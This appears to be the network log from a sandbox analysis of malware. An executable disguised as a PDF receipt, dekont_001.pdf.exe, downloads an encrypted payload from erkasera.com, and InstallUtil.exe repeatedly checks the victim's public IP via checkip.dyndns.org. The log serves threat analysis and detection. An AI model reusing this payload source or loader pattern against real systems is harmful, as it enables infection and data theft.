Oct 25, 2024 21:27:10.187561035 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:10.825377941 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d409a98a932af23d11be276a52ffba5e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:11.605093002 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:12.237787008 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dbb21752cc7b7401bfcc841f0d9b15e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:13.058166027 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:13.710165977 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2dd9ad9f44cafd8c05ab732503dd4cdd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:14.524662971 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:15.166908979 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 222b461fcdb08d91f90bda99bb5c0ae1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:15.971146107 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:17.334846020 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4504d7732fa98edee3c8edee4019934f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 21:27:17.335558891 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4504d7732fa98edee3c8edee4019934f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 21:27:17.336061954 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4504d7732fa98edee3c8edee4019934f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:22.321840048 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:22.969538927 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:22 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4410a8d739f324b4db9e9b0c400e17be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 21:27:22.975471020 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:23.123694897 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 53c62ae803df077894fc6a2f27eb46ef Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 21:27:24.252321959 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:24.399856091 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a1404e3b6713b401818ba1d65d973e59 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:25.183352947 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:25.840465069 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 12fff7a763f73c6be24ca7633e1c147e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:26.623567104 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:27.254623890 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:27 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 30d1fd6bc1e5aee572e6e6fcc6d8610a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:28.042321920 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:28.678370953 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b60059d29b656209df6bf5dbba46a78b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:29.471128941 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:30.105936050 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 70392cc9a38387028acdf9313e625726 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:30.908843994 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:31.541018009 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 644000c581624a5f59f08c7f1928f978 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	158.101.44.242	80	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:32.336241007 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:32.978553057 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 619b573ad8f7aeb045e02f35fc0eb737 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.132.193.46	443	6968	C:\Users\user\Desktop\dekont_001.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:26:59 UTC	82	OUT	GET /seuias/Mfevxcugo.dat HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-10-25 19:27:00 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Fri, 25 Oct 2024 11:23:19 GMT accept-ranges: bytes content-length: 952328 date: Fri, 25 Oct 2024 19:26:42 GMT
2024-10-25 19:27:00 UTC	16384	IN	Data Raw: 79 58 6b 25 f0 47 3b 43 7f 9b 86 32 f0 69 c9 83 ee 44 b4 92 cb ed 58 9f 10 96 57 ab 00 79 c4 ff 79 3b 19 8f 5e 6f c7 c8 2a 4c 82 22 5a 46 2c 9a 87 32 7d 56 50 f3 ac 7f 31 a0 15 e1 e1 67 cf 24 56 e1 79 10 d0 db c2 9a 5f a8 6e 6d c3 8a f3 98 54 dd 01 77 ed c5 ce c4 1e 7c 12 4a fe 70 d6 b1 df 86 9a 8d a9 dd 46 43 f6 24 48 f8 1d 84 9d ff 89 5c 48 be bd 19 b6 92 58 f6 8e 30 07 1e 91 3d 7e 73 c7 4c b9 99 9a 32 34 ea 19 b5 f8 d9 ee bb 91 33 f2 a3 19 b7 5d ff 56 f8 5a 11 e0 7a 27 d4 b0 44 1d 41 65 d7 0c 5d c4 e2 e5 60 07 e4 05 64 60 9c c0 49 e2 1f 0b 4c 19 16 41 2f 63 97 c2 68 4c 46 a7 30 a6 d2 c4 49 ce 88 a9 22 b0 43 61 19 4f d6 64 5c e2 38 6e 6c c3 c7 9a a4 12 be 52 ce 83 ab 71 ca 18 0f 3d 79 47 fd 5e e3 1e 9a 1c 8a 63 e2 77 0d ef 78 28 8f 20 4c 30 48 38 18 22 Data Ascii: yXk%G;C2iDXWyy;^o*L"ZF,2}VP1g$Vy_nmTw\|JpFC$H\HX0=~sL243]VZz'DAe]`d`ILA/chLF0I"CaOd\8nlRq=yG^cwx( L0H8"
2024-10-25 19:27:00 UTC	16384	IN	Data Raw: 93 b3 66 f0 ec da 1f 41 0a 96 f6 8d 96 b3 56 dd db 83 97 4f 02 2a 1a 35 60 f9 dc 65 88 59 bb 83 50 b9 c0 f2 4d 4b 52 4d a4 82 4b e6 5f 3b ef 07 e6 d8 07 b8 dd b3 2b 11 ba 05 32 4a d0 45 b0 b5 85 be c0 67 d1 50 e4 8a 85 93 41 03 3d ae af 92 be 57 81 e1 60 dd f8 71 56 fa 59 df 9f ed 06 a0 3d c9 92 d0 24 9b 7b 24 ab c6 e7 14 78 51 3d bd a4 98 e1 3c ee d4 2c 8d a8 76 e8 39 1a 66 c4 dc 78 1e cc b7 90 9c 45 c2 e1 57 e4 96 bb d3 05 ba 8e 91 1a ea 07 98 08 6c 0e a1 2f 4e e4 9f df 37 c4 23 6d 07 2f db ac 4f 4c 3b 60 0b 6b e3 e2 9c c6 18 25 76 c5 62 59 5f 83 c1 fd 45 74 dc 0f 70 d4 50 35 02 a8 97 ee b2 d7 f1 66 bd 69 9f a7 17 2e 02 f1 53 c5 42 90 23 60 10 12 18 3f 3b 6a 1a da 2b ac a3 c5 74 83 5b 78 93 e9 52 7f b7 bd a3 d2 75 1c 81 f0 a5 f7 be 03 b3 62 ef f8 c2 18 Data Ascii: fAVO*5`eYPMKRMK_;+2JEgPA=W`qVY=${$xQ=<,v9fxEWl/N7#m/OL;`k%vbY_EtpP5fi.SB#`?;j+t[xRub
2024-10-25 19:27:00 UTC	16384	IN	Data Raw: 29 50 a8 c6 10 6e bf be dc 98 5f 7e 89 06 cd 2d 9e 21 e8 7c cf 5a 04 b6 4e 19 d9 10 25 ac a6 8a 4b 73 de 2f 95 88 2a d6 42 42 0d 1c 3b eb 4d b6 83 ff aa b6 75 c8 d6 7d 0d f1 20 a1 2f 75 46 a8 a0 b1 34 2b fc 00 12 a0 6f 2f 9f 2a 7e f8 10 95 35 3c 05 c9 23 28 2a 5d f1 e2 81 de ee a4 c0 50 f4 42 87 ed 7b 24 cb f7 15 b4 07 f7 a2 33 13 ab 05 b6 19 c7 12 81 e5 c6 43 5a 4f 69 05 35 86 66 de e3 56 2c 78 48 4c a7 38 79 60 73 4b 0e aa 19 86 83 7d e2 34 c9 af 00 c4 0d ac c6 9b d5 ea fb 1a 85 40 cb ea 38 1b 33 4a 1a fe 20 bf 57 fc 40 9c a9 b2 aa 9b 3a ee a2 39 84 30 d6 66 6f 17 d6 90 14 7e 1c 32 75 a4 52 ed f4 04 c8 30 a3 d3 2e b2 c0 27 77 48 e8 50 a0 3d 80 17 59 ef 11 12 bc c1 d3 a9 0f 8b e9 7d d6 79 cf a9 12 74 1d ab 4c 55 67 30 d4 2b 3b 3c 68 dd d0 1d 86 d3 0b fb Data Ascii: )Pn_~-!\|ZN%Ks/BB;Mu} /uF4+o/~5<#(*]PB{$3CZOi5fV,xHL8y`sK}4@83J W@:90fo~2uR0.'wHP=Y}ytLUg0+;<h
2024-10-25 19:27:00 UTC	16384	IN	Data Raw: 23 ea b0 a5 c0 7c de f9 ae 63 71 d2 86 29 98 d3 0a ef 72 d5 0c 3a 14 14 2e c3 5d 35 bc ce f9 13 3b df aa c8 7d 5d ea 97 fc 0f d4 fa 75 b8 34 3c 9d aa 88 91 1a 63 97 e6 e7 e0 50 c2 50 d2 3f 02 f6 85 0a 52 0f f5 e5 b4 76 8b 99 69 6a f0 13 63 46 5f 98 a9 98 b6 52 b0 85 17 45 2f 41 58 7a dd 14 b0 df 60 0d 09 7f 08 6b 7f ae f2 25 47 63 7e c4 66 30 31 8e 83 c8 10 4d 57 52 41 d9 32 cb 4b 07 55 80 6a 67 83 4c 4f 24 b3 f5 4f bb e3 45 0d 28 47 b4 62 01 e6 bd f4 db 6a 05 e4 72 e0 14 d7 9a 17 a0 70 c3 cf 28 fd 15 7d e0 58 df 1a 2e cc 51 c7 d8 a8 5a 53 f0 de 5a c9 92 1e 52 bb e5 f5 2c 17 2f 6c d6 c0 fb 12 53 ae 3b 7f 58 1b 4a 98 24 c6 5e 13 9b 76 53 c4 dc ac ae 70 94 91 68 e4 ec 8a 5f 60 8b df 11 8b 3a b0 fe 2b ef 23 6f a9 cd ff 41 18 3b a9 6b e8 00 5a b3 e1 9f 08 b4 Data Ascii: #\|cq)r:.]5;}]u4<cPP?RvijcF_RE/AXz`k%Gc~f01MWRA2KUjgLO$OE(Gbjrp(}X.QZSZR,/lS;XJ$^vSph_`:+#oA;kZ
2024-10-25 19:27:00 UTC	16384	IN	Data Raw: f7 72 50 3e cd de 78 43 af 0c 22 10 e9 4f ff 03 eb dc b0 6f ff 5b 8b d4 66 7f 82 55 92 26 b8 7c bf e1 ed b2 71 3e 1d 9b f2 ce 7f ec 38 f8 77 c6 48 57 57 04 60 83 bb 4f 45 48 ad b8 bd 92 9d 4a 95 d7 f8 e5 7d 29 65 2f 09 71 6e 23 3c c5 bc 05 f0 6f 2d 29 f0 b7 0c d3 f0 0f c3 ab da d0 ed 75 81 4b 63 41 ac 5d 33 fd 68 86 ca 99 68 69 bc f1 4f 52 56 30 de e9 95 62 bd 3e 34 b3 31 96 51 ed 48 95 89 26 ed eb 24 17 42 3b c4 6a d3 c5 62 15 7e 37 e4 7a a5 74 05 b6 c4 df 39 0c b0 0c ca fe b3 99 97 a0 93 6d 92 ea f0 f2 d1 25 53 ea c1 ae 45 c8 2d 4d 31 de 52 47 03 66 21 b6 39 a7 52 40 b5 67 ac 05 1a 0f 19 91 df ad 2f 03 e2 88 b3 ed 85 98 d5 68 ad 57 15 fe 0b b8 b1 13 c2 4a fa 0f af 98 ad 51 9b 3a 6f 8a ce 59 11 1b ec a7 f3 63 24 f1 0f cf cb ee 54 fe b8 c9 a9 1e f0 7f 99 Data Ascii: rP>xC"Oo[fU&\|q>8wHWW`OEHJ})e/qn#<o-)uKcA]3hhiORV0b>41QH&$B;jb~7zt9m%SE-M1RGf!9R@g/hWJQ:oYc$T
2024-10-25 19:27:01 UTC	16384	IN	Data Raw: 9c 7e f8 d0 33 b9 34 28 cd e4 b0 0f 37 79 39 b8 92 7c 6e d4 71 2b fa b3 67 30 15 4d f0 5c 80 82 e7 6a 9f 98 73 b8 f1 f8 f0 36 5c ac a9 77 06 61 7f f7 99 09 6f db 0c 71 ee fe 27 bc e8 fb 27 81 4b 8a d3 61 76 67 53 8f 15 7d 74 00 f9 72 10 78 18 a4 d9 ec 67 10 ee 6b 77 df 0d 81 6c f5 60 54 eb 2b 62 bf 8f 75 06 c0 30 53 ba 12 72 55 a8 56 b8 f4 79 72 7d 8a 1e 4f 5a 0e 40 b3 9c 29 c2 b2 1e 0a 05 e7 21 d6 65 4a a0 c8 42 46 40 16 c4 6e 14 b3 d4 9d bc 96 56 2c 74 78 56 11 bc 6a 58 6a d3 7c b1 30 11 d0 86 c0 8f bf c3 a3 71 26 63 02 bc b4 12 1e 5d 6b 1b 63 06 19 10 23 82 91 e0 67 90 20 b9 5e 3f 95 db d5 3d ca d2 d8 7c 60 ab fe 14 fc bd 9b ce 37 67 4c 18 fc 99 4a fb 2b 61 18 f4 4d ee 46 77 37 b4 a2 e4 fa 5a ca 79 cd 2f 78 de e6 51 e8 d9 ff 1d 60 e6 b9 8d 6c d4 78 ed Data Ascii: ~34(7y9\|nq+g0M\js6\waoq''KavgS}trxgkwl`T+bu0SrUVyr}OZ@)!eJBF@nV,txVjXj\|0q&c]kc#g ^?=\|`7gLJ+aMFw7Zy/xQ`lx
